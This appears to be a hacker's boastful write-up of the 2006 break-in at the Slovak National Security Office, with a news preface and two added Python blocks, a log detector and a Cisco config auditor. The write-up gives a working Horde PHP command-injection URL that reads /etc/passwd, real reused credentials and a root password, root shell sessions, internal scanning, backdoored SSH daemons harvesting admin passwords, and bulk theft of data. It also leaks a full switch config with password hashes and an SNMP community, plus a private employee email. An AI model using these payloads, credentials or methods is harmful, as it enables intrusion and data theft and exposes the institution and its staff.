




nbusr123


After the hack of the Slovak National Security Office (NBÚ) on 25 April 2006, Slovak police arrived at the server room on 20 July 2006 at 10:00 and, on an order of the General Prosecutor's Office, physically seized the server Onyx, which held the data of Kyberia.sk as well as the Hysteria.sk pages.

The Hysteria.sk administrators - Maniac, Pajkus and Zyx - however issued a statement in which they assert that the Onyx server was never used for hacking the NBÚ and served only for communication. It was precisely because of its thoroughly secured communication that "Hysteka" was popular among hackers.

The hackers answered the seizure of the Onyx server on 21 July 2006 by demonstratively cutting the entire NBÚ server off from the internet. According to the NBÚ, they are already working on the problem together with the FBI, and 7 specialists are to fly in from Washington...

Cached from: http://blackhole.sk/node/442


Thanks to the primitive security of the institution in question, an anal penetration of the NBU servers took place without Milan's knowledge. 20 gigabytes of mails, internal documents, directives, regulations and similar cr**** leaked from the NBU :)

It all started with jokes among friends who noticed a bug in the mail interface at webmail.nbusr.sk that made it possible to execute system commands on the server. (I know this sentence sounds totally lame, but let people less versed in the subject understand it too ;))
That made it possible to grab the list of local users on the machine.


http://webmail.nbusr.sk/horde/services/help/?show=about&module=;%22.passthru(%22cat%20%22.chr(47).%22etc%22.chr(47).%22passwd%22);%27.
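Detection from the defender's side, as an added example that is not code from the original post: a Python checker that scans web-server access-log lines for requests to the Horde help module whose parameters, once percent-decoded, carry PHP calls such as passthru( or chr(, as in the request above. The log lines, the /horde/services/help/ path prefix and the IP addresses are constructed samples.

```python
import re
from urllib.parse import unquote

# Constructed Apache combined-format log lines, not real NBU logs; the first
# one carries the help-module request pattern quoted above.
SAMPLE_LOG = """\
10.0.0.5 - - [25/Apr/2006:10:12:01 +0200] "GET /horde/services/help/?show=about&module=;%22.passthru(%22cat%20%22.chr(47).%22etc%22.chr(47).%22passwd%22);%27. HTTP/1.1" 200 1532 "-" "Mozilla/4.0"
10.0.0.9 - - [25/Apr/2006:10:12:07 +0200] "GET /horde/services/help/?show=about&module=imp HTTP/1.1" 200 8120 "-" "Mozilla/4.0"
10.0.0.9 - - [25/Apr/2006:10:12:09 +0200] "GET /horde/login.php HTTP/1.1" 200 4012 "-" "Mozilla/4.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# PHP calls that have no business inside a help-module name.
INJECTION_RE = re.compile(r'\b(passthru|system|exec|shell_exec|popen|eval|chr)\s*\(', re.I)

def decode_fully(s, rounds=3):
    """Percent-decode repeatedly so double-encoded payloads are still visible."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s

def check_request(target):
    """Return [(param, decoded_value)] for help-module parameters carrying PHP calls."""
    path, _, query = target.partition('?')
    if not path.startswith('/horde/services/help/'):
        return []
    hits = []
    for pair in query.split('&'):          # split on & only, never on ;
        name, _, value = pair.partition('=')
        decoded = decode_fully(value)
        if INJECTION_RE.search(decoded):
            hits.append((decode_fully(name), decoded))
    return hits

def scan_log(text):
    """Return one alert dict per log line whose request looks injected."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = check_request(m['target'])
        if hits:
            alerts.append({'ip': m['ip'], 'ts': m['ts'], 'status': m['status'], 'hits': hits})
    return alerts
```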

The user with the login nbusr stuck out in particular.
Well...
A cruel joke - trying the password nbusr123 - nearly split our sides - the password worked (on the first try). The motd showed up and we were logged in on the machine.

After a bit of poking around and running about the machine we tried su to root. Side-splitting attack number 2 :)


%su
www.nbusr.sk# id
uid=0(root) gid=0(wheel) groups=0(wheel), 5(operator)
www.nbusr.sk# uname -a
FreeBSD www.nbusr.sk 6.0-RELEASE FreeBSD 6.0-RELEASE #0:Thu Nov 3 UTC 2005 root@x64.samsco.home:/usr/obj/usr/src/sys/GENERIC i386
www.nbusr.sk#

So (for the uninitiated) gaining full rights over the server was possible from the nbusr login without entering any password whatsoever..

Next came a scan of 10.0.240.0/24, which is the subnet the machine sits in. (So we were scanning machines that are not normally reachable from the internet and are supposed to be protected by a fire wall ;)

About 5-6 machines responded, and sshd was listening on them as well.

So next we tried logging in to one of these machines, with the already known login and password nbusr/nbusr123. Of course, the situation repeated itself and we had a shell again.
This machine was named archive, which suggested something interesting would be found there.

After about half an hour of running around the disk we found, in the home directory of one of the admins, the sources of some backup utility written in C. (btw quite good code, although handling pgsql backups in C strikes me as doing things the roundabout way ;). Right at the beginning of the source a login/password for the database was defined. The password was 123456 :) At that point came the interesting idea of trying this password on root


nbusr@archive> su
Password:
nbusr@archive# id
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
nbusr@archive# uname -a
FreeBSD archive.nbusr.sk 4.10-STABLE FreeBSD 4.10-STABLE #1: Mon Feb 14 14:47:10 CET 2005 root@archive.nbusr.sk:/usr/src/sys/compile/ARCHIVE i386
nbusr@archive#

Another side-splitting fit..

From archive we carried off a roughly 18 GB database. Another interesting machine was ep.nbusr.sk ;)

After obtaining this password, essentially the whole network opened up to us, since the password worked on all the other devices of a unix (servers) or network (cisco routers/switches) nature. In the evening, backdoored ssh daemons were deployed on the machines, which recorded the admins' movements across further machines for us (with passwords, of course :) )
Under cover of night, gigabytes of mails and other confidential data merrily flowed through the switches and routers to us, into the right hands onto encrypted disks ;)

After the administrators' clueless moves, full access to the NBU network is still possible at the time of writing this article. Anyone with minimal computer knowledge can access their data from the comfort of their home. Not everything that is secure is really secure and not everything that is secret is all that secret :) The sad memento of this act is the finding that Azet is a better secured system than the institution overseeing highly confidential documents.

With this we bid you farewell, greetings to grandma and the dog Filip, Feri.. I want world peace, a joyful life for all the children of the world and papers for everyone :)

A treat to finish, the National (In)Security Office:
(we will not be publishing the documents, for fear of being charged with treason and burned at the stake)
Sooo, some prompts, configs, mails ;)
enjoy

update: since the whole situation turned into quite an affair, you can also buy joke T-shirts.


root@fw.nbu.ba# id
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
root@fw.nbu.ba# uname -a
FreeBSD fw.nbu.ba 4.10-RELEASE FreeBSD 4.10-RELEASE #0: Wed Jul 14 15:56:18 GMT 2004 kockac@builder.netlabplus.sk:/usr/src/release/picobsd/build_dir-fleshboxR/PICOBSD-fleshboxR i386
root@fw.nbu.ba#
root@fw.nbu.ba# df -h
Filesystem Size Used Avail Capacity Mounted on
/dev/md0c 47M 24M 23M 52% /
root@fw.nbu.ba#

s4.nbu.ba#sh ver
Cisco Internetwork Operating System Software
IOS (tm) C2950 Software (C2950-I6Q4L2-M), Version 12.1(14)EA1a, RELEASE SOFTWARE (fc1)
Copyright (c) 1986-2003 by cisco Systems, Inc.
Compiled Tue 02-Sep-03 03:33 by antonino
Image text-base: 0x80010000, data-base: 0x805C0000

ROM: Bootstrap program is CALHOUN boot loader

s4.nbu.ba uptime is 45 weeks, 5 days, 16 hours, 10 minutes
System returned to ROM by power-on
System restarted at 11:31:30 CETdst Sat Jun 4 2005
System image file is "flash:/c2950-i6q4l2-mz.121-14.EA1a.bin"

cisco WS-C2950-24 (RC32300) processor (revision M0) with 20710K bytes of memory.
Processor board ID FOC0752Y3BL
Last reset from system-reset
Running Standard Image
24 FastEthernet/IEEE 802.3 interface(s)

s7.nbu.ba#sh ver
Cisco Internetwork Operating System Software
IOS (tm) C3500XL Software (C3500XL-C3H2S-M), Version 12.0(5)WC9, RELEASE SOFTWARE (fc1)
Copyright (c) 1986-2003 by cisco Systems, Inc.
Compiled Fri 19-Sep-03 10:01 by antonino
Image text-base: 0x00003000, data-base: 0x0034E434

ROM: Bootstrap program is C3500XL boot loader

s7.nbu.ba uptime is 45 weeks, 5 days, 15 hours, 13 minutes
System returned to ROM by power-on
System restarted at 12:08:39 CETdst Sat Jun 4 2005
System image file is "flash:c3500xl-c3h2s-mz.120-5.WC9.bin"

cisco WS-C3524-XL (PowerPC403) processor (revision 0x01) with 8192K/1024K bytes of memory.
Processor board ID FAB0547P1KW, with hardware revision 0x00
Last reset from power-on

s9.nbu.ba#sh ver
Cisco Internetwork Operating System Software
IOS (tm) C3500XL Software (C3500XL-C3H2S-M), Version 12.0(5.2)XU, MAINTENANCE INTERIM SOFTWARE
Copyright (c) 1986-2000 by cisco Systems, Inc.
Compiled Mon 17-Jul-00 18:29 by ayounes
Image text-base: 0x00003000, data-base: 0x00301F3C

ROM: Bootstrap program is C3500XL boot loader

s9.nbu.ba uptime is 45 weeks, 5 days, 14 hours, 46 minutes
System returned to ROM by power-on
System restarted at 12:34:15 CETdst Sat Jun 4 2005
System image file is "flash:c3500XL-c3h2s-mz-120.5.2-XU.bin"

cisco WS-C3524-XL (PowerPC403) processor (revision 0x01) with 8192K/1024K bytes of memory.
Processor board ID FAB0514Q18E, with hardware revision 0x00
Last reset from power-on

s11.nbu.ba#sh ver
Cisco Internetwork Operating System Software
IOS (tm) C2950 Software (C2950-I6Q4L2-M), Version 12.1(13)EA1, RELEASE SOFTWARE (fc1)
Copyright (c) 1986-2003 by cisco Systems, Inc.
Compiled Tue 04-Mar-03 02:14 by yenanh
Image text-base: 0x80010000, data-base: 0x805A8000

ROM: Bootstrap program is CALHOUN boot loader

s11.nbu.ba uptime is 3 weeks, 3 days, 11 hours, 30 minutes
System returned to ROM by power-on
System image file is "flash:/c2950-i6q4l2-mz.121-13.EA1.bin"

cisco WS-C2950G-24-EI (RC32300) processor (revision G0) with 20839K bytes of memory.
Processor board ID FOC0743Z2H9
Last reset from system-reset
Running Enhanced Image
24 FastEthernet/IEEE 802.3 interface(s)
2 Gigabit Ethernet/IEEE 802.3 interface(s)

Well, and a Cisco config ;)

root@archive# telnet 10.0.200.11
Trying 10.0.200.11...
Connected to 10.0.200.11.
Escape character is '^]'.

User Access Verification

Username: nbusr
Password:
s11.nbu.ba>ena
Password:
Password:
s11.nbu.ba#sh run
Building configuration...
Current configuration : 3761 bytes
!
version 12.1
no service pad
service timestamps debug datetime msec localtime show-timezone
service timestamps log datetime msec localtime show-timezone
service password-encryption
!
hostname s11.nbu.ba
!
enable password 7 101F5B4A514244
!
username nbusr password 7 070123595D1B485744
clock timezone CET 1
clock summer-time CETdst recurring last Sun Mar 2:00 last Sun Oct 3:00
ip subnet-zero
ip rcmd rsh-enable
ip rcmd remote-host monitor 10.0.240.7 monitor enable
ip rcmd remote-host www 10.0.240.7 www enable
no ip domain-lookup
!
spanning-tree mode pvst
no spanning-tree optimize bpdu transmission
spanning-tree extend system-id
!
!
interface FastEthernet0/1
description 919 - III 11 08
switchport trunk native vlan 999
switchport mode trunk
no ip address
load-interval 60
no cdp enable
!
interface FastEthernet0/2
switchport access vlan 3
no ip address
load-interval 60
no cdp enable
spanning-tree portfast
!
interface FastEthernet0/3
description 1118 - 18 2
switchport access vlan 3
no ip address
load-interval 60
no cdp enable
spanning-tree portfast
!
interface FastEthernet0/4
description 1116 - 16 5
switchport access vlan 3
no ip address
load-interval 60
no cdp enable
spanning-tree portfast
!
interface FastEthernet0/5
description 1114 - 14 9
switchport access vlan 3
no ip address
load-interval 60
no cdp enable
spanning-tree portfast
!
interface FastEthernet0/6
description 1114 - 14 10
switchport access vlan 3
no ip address
load-interval 60
no cdp enable
spanning-tree portfast
!
interface FastEthernet0/7
description 1112 - 12 13
switchport access vlan 3
no ip address
load-interval 60
no cdp enable
spanning-tree portfast
!
interface FastEthernet0/8
description 1111 - 11 15
switchport access vlan 3
no ip address
load-interval 60
no cdp enable
!
interface FastEthernet0/9
description 1130 - 30 18
switchport access vlan 3
no ip address
load-interval 60
no cdp enable
spanning-tree portfast
!
interface FastEthernet0/10
description 1124 - 24 30
switchport access vlan 3
no ip address
load-interval 60
no cdp enable
!
interface FastEthernet0/11
description 1123 - 23 32
switchport access vlan 3
no ip address
load-interval 60
no cdp enable
!
interface FastEthernet0/12
description 1122 - 22 33
switchport access vlan 3
no ip address
load-interval 60
no cdp enable
spanning-tree portfast
!
interface FastEthernet0/13
switchport access vlan 3
switchport mode access
no ip address
no cdp enable
spanning-tree portfast
!
interface FastEthernet0/14
no ip address
no cdp enable
!
interface FastEthernet0/15
no ip address
no cdp enable
!
interface FastEthernet0/16
no ip address
no cdp enable
!
interface FastEthernet0/17
no ip address
no cdp enable
!
interface FastEthernet0/18
no ip address
no cdp enable
!
interface FastEthernet0/19
no ip address
no cdp enable
!
interface FastEthernet0/20
no ip address
no cdp enable
!
interface FastEthernet0/21
no ip address
no cdp enable
!
interface FastEthernet0/22
no ip address
no cdp enable
!
interface FastEthernet0/23
no ip address
no cdp enable
!
interface FastEthernet0/24
no ip address
no cdp enable
!
interface GigabitEthernet0/1
no ip address
no cdp enable
!
!
interface GigabitEthernet0/2
no ip address
no cdp enable
!
interface Vlan1
ip address 10.0.200.11 255.255.255.0
no ip route-cache
!
ip default-gateway 10.0.200.1
no ip http server
!
no cdp run
snmp-server engineID local 00000009020000078432D3C0
snmp-server community swmon RO
!
line con 0
exec-timeout 0 0
logging synchronous
login local
stopbits 1
line vty 0 4
exec-timeout 0 0
logging synchronous
login local
line vty 5 15
exec-timeout 0 0
logging synchronous
login local
!
ntp clock-period 17179919
ntp server 213.215.72.7
end
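As an added example, not part of the original post: a Python audit of an IOS running-config that flags the weak settings visible in the config above (reversible type-7 passwords, rsh trust entries, an SNMPv1/v2c community, and vty lines with no idle timeout, no access-class and telnet left open). The config excerpt is constructed in the style of the page and its type-7 strings are placeholders.

```python
import re
from itertools import takewhile

# Constructed excerpt in the style of the s11 config above; the type-7
# strings are placeholders, not the values shown on the page.
SAMPLE_CONFIG = """\
service password-encryption
enable password 7 PLACEHOLDER
username nbusr password 7 PLACEHOLDER
ip rcmd rsh-enable
ip rcmd remote-host www 10.0.240.7 www enable
snmp-server community swmon RO
line vty 0 4
 exec-timeout 0 0
 login local
line vty 5 15
 exec-timeout 0 0
 login local
end
"""

# Top-level commands that weaken the device; service password-encryption only
# applies type 7, which is an obfuscation and not a hash.
GLOBAL_RULES = [
    ('ENABLE_PASSWORD', r'^enable password\b', 'type 7 is reversible; use enable secret'),
    ('USER_PASSWORD7', r'^username \S+ password 7\b', 'reversible; use username ... secret'),
    ('RSH_ENABLED', r'^ip rcmd rsh-enable\b', 'rsh trusts hosts, not credentials; disable'),
    ('RCMD_TRUST', r'^ip rcmd remote-host\b', 'listed host may run rsh commands as this user'),
    ('SNMP_COMMUNITY', r'^snmp-server community\b', 'v1/v2c community string; prefer SNMPv3'),
]

def audit_config(text):
    """Return (rule_id, line_no, message) findings for an IOS running-config."""
    findings = []
    lines = text.splitlines()
    for idx, line in enumerate(lines):
        for rule_id, pattern, msg in GLOBAL_RULES:
            if re.match(pattern, line):
                findings.append((rule_id, idx + 1, f'{line}: {msg}'))
        if line.startswith('line vty'):
            # Sub-commands are indented; the block ends at the next top-level command.
            block = [s.strip() for s in takewhile(lambda s: not s or s.startswith(' '), lines[idx + 1:])]
            if not any(b.startswith('transport input ssh') for b in block):
                findings.append(('VTY_TELNET', idx + 1, f'{line}: telnet allowed; set transport input ssh'))
            if 'exec-timeout 0 0' in block:
                findings.append(('VTY_NO_TIMEOUT', idx + 1, f'{line}: idle sessions never time out'))
            if not any(b.startswith('access-class') for b in block):
                findings.append(('VTY_NO_ACL', idx + 1, f'{line}: no access-class limiting source hosts'))
    return findings
```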

And some VLANs here and there :) :

s9.nbu.ba#sh vlan
VLAN Name Status Ports
---- -------------------------------- --------- -------------------------------
1 default active Gi0/1, Gi0/2
2 Servers active
3 Workstations active Fa0/5, Fa0/6, Fa0/7, Fa0/8,
Fa0/9, Fa0/10, Fa0/11, Fa0/12,
Fa0/13, Fa0/15, Fa0/16, Fa0/17,
Fa0/18, Fa0/19, Fa0/20, Fa0/21,
Fa0/22, Fa0/23, Fa0/24
4 Govnet active Fa0/14
999 Dummy active

Well, and this is paid for with Slovak taxpayers' money ;)
(a sample from one employee's e-mail correspondence)


Date: Fri, 24 Feb 2006 12:53:50 +0100
From: xxxx xxxx
Subject: ahojky
To: xxx xxx
X-Mailer: Microsoft Outlook Express 6.00.2800.1506
Hi xxxx, greetings from xxxx ("the jerk from Komjatice" hehe).
You somehow haven't been in touch from that London of yours.... I know, there isn't that much time. And I don't write all that often either... sorry!!! I don't even know what I should write to you about,... I've never seen so much creativity in myself, haha. We're doing very well here at our office.... you know, we're not exactly going to kill ourselves with work.

 





